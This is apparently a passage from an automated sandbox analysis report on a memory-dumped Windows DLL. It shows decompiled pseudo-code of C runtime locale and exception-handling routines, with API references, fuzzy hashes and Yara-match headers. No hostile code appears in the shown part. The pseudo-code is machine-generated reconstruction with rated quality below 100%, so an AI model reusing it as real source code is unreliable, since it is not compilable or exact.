																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6E1D162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6E1A1438(_t587);
																																																	E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e22851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6e22c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6E1D542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6E1E0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t649);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6e286dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t648);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6e286e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t647);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6e286dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t646);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6e286dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t645);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6e286de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t644);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6e286ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6E1C6FD3(__eflags, _t643);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6e286db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6E1C6FD3(__eflags, _t642);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6e286dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6E1C6FD3(__eflags, _t641);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6e286dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6E1C6FD3(__eflags, _t640);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6e286dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6E1C6FD3(__eflags, _t639);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6e286df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6E1C6FD3(__eflags, _t638);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6e286df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6E1C6FD3(__eflags, _t637);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6e286dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6E1C6FD3(__eflags, _t636);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6e286df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6E1C6FD3(__eflags, _t635);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6e286dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF37C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF386
int.LIBCPMT ref: 6E1CF39D

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF415

Strings

pm(n, xrefs: 6E1CF391

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pm(n
API String ID: 651022567-4246979846
Opcode ID: 294fdf7bccc1e569a6efd024c948710d130992e26a23a7601968764d82758992
Instruction ID: a133a39583de3a20a79a042813344a1cb77d975f4a44bc8088a2d49963d4b37b
Opcode Fuzzy Hash: 294fdf7bccc1e569a6efd024c948710d130992e26a23a7601968764d82758992
Instruction Fuzzy Hash: E6115C7591051DDBCF01DBE4C854AFEB37ABF64B14F240809D420E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E1E00AC(0x6e228144, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e29ce80;
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1A161C(0x6e286b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1A171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E1C66BA(_t61 - 0x14);
					return E6E1E0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1A18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t61 - 0x20);
							E6E1E3D74(_t61 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e228192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E1C4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E1C5BFB();
							return E6E1E0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E1C6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e29ce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6e1c4a80
0x6e1c4a87
0x6e1c4a91
0x6e1c4a96
0x6e1c4a9f
0x6e1c4aa5
0x6e1c4aa8
0x6e1c4aad
0x6e1c4ab1
0x6e1c4ab6
0x6e1c4aba
0x6e1c4af5
0x6e1c4af8
0x6e1c4b04
0x6e1c4abc
0x6e1c4abe
0x6e1c4ac4
0x6e1c4aca
0x6e1c4ad2
0x6e1c4ad5
0x6e1c4b08
0x6e1c4b16
0x6e1c4b1b
0x6e1c4b23
0x6e1c4b2f
0x6e1c4b35
0x6e1c4b38
0x6e1c4b3b
0x6e1c4b3d
0x6e1c4b40
0x6e1c4b42
0x6e1c4b4a
0x6e1c4b53
0x6e1c4ad7
0x6e1c4ad7
0x6e1c4ada
0x6e1c4ade
0x6e1c4ae2
0x6e1c4aec
0x6e1c4aef
0x00000000
0x6e1c4aef
0x6e1c4ac0
0x6e1c4ac0
0x00000000
0x6e1c4ac0
0x6e1c4abe

APIs

__EH_prolog3.LIBCMT ref: 6E1C4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4A91
int.LIBCPMT ref: 6E1C4AA8

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4B16

Strings

4k(n, xrefs: 6E1C4A9A

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4k(n
API String ID: 651022567-3990386398
Opcode ID: 20849863af2e10c2a3114d840e2be79ee62cbff266e0a9605731ca0474c22520
Instruction ID: 52377b831dd09ab936afd4acb59c211208609b4003ec56069c12ba55a5771372
Opcode Fuzzy Hash: 20849863af2e10c2a3114d840e2be79ee62cbff266e0a9605731ca0474c22520
Instruction Fuzzy Hash: F91125B59005298BCF01DBE4C844AFDB779BF24B14F140908E111EB2D0DF78C985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E20E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E20F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e20da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e230f34);
					_push( *0x6e230dec);
					E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e230dec;
					while(1) {
						L2:
						_t246 = E6E21D470(_t430, 0x351, 0x6e230f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e230f34);
							_push( *_t373);
							E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e230e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E20CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_v56 =  *0x6e28506c ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E20E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E20DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e20da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E21D60D(_t447, 0x6e230f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e230dec;
													_v460 = 1;
													do {
														_t268 = E6E20ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e230e1c;
													} while (_t365 <= 0x6e230e1c);
													_t362 = _v472 + 2;
													_t269 = E6E21D5BD(_t379, _t362, 0x6e230f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E21D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E202188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_v556 =  *0x6e28506c ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E20D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E20DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E20F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2091A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E202188();
																					asm("int3");
																					_t295 =  *0x6e2876f0;
																					 *0x6e285108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2851c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2851ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E20DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E216102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e230ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
